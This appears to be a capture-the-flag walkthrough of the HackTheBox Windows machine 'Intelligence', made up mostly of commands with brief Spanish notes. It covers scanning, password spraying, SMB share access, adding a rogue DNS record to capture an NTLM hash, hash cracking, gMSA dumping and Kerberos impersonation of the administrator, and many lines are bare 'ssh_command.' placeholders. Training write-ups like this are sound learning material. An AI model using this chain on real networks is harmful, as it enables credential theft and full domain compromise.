Intelligence

Intelligence


HTB Windows

echo “10.129.95.154 intelligence.htb” | sudo tee -a /etc/hosts

nmap -A -p- -oA intelligence 10.129.95.154 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA intelligence 10.129.95.154

nmap -sU -O -p- -oA intelligence-udp 10.129.95.154

nikto -h 10.129.95.154:80

gobuster dir -k -u http://10.129.95.154/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

ssh_command.

strings 2020-01-01-upload.pdf

ssh_command.

ssh_command.

cat users

ssh_command.

Encontramos la contrasena de NewIntelligenceCorpUser9876

ssh_command.

crackmapexec smb 10.129.95.154 -u users -p NewIntelligenceCorpUser9876

ssh_command.

smbclient -L 10.129.95.154/ -U Tiffany.Molina

ssh_command.

smbclient -L //10.129.95.154/ -U Tiffany.Molina

smbclient //10.129.95.154/IT -U Tiffany.Molina

ssh_command.

cat downdetector.ps1

ssh_command.

Tenemos que registrar nuestro dominio falso para tener acceso a root. Vemos el usuario Ted Graves.

python3 dnstool.py -u “intelligence.htb\Tiffany.Molina” -p NewIntelligenceCorpUser9876 -a add -r webfake.intelligence.htb —data 10.10.14.94 10.129.95.154

ssh_command.

hashid intelligence_hash.txt

ssh_command.

john —wordlist=/usr/share/wordlists/rockyou.txt intelligence_hash.txt

ssh_command.

hashcat -a 3 -m 5600 intelligence_hast.txt /usr/share/wordlists/rockyou.txt —show

ssh_command.

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb

ssh_command.

python3 /opt/impacket/examples/getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83… -impersonate administrator

ssh_command.

python3 /opt/impacket/examples/atexec.py -k -no-pass dc.intelligence.htb -hashes ‘whoami’

ssh_command.

python3 /opt/impacket/examples/smbclient.py -k intelligence.htb/Administrator@dc.intelligence.htb -no-pass

ssh_command.

© 2025 Cu3rv0x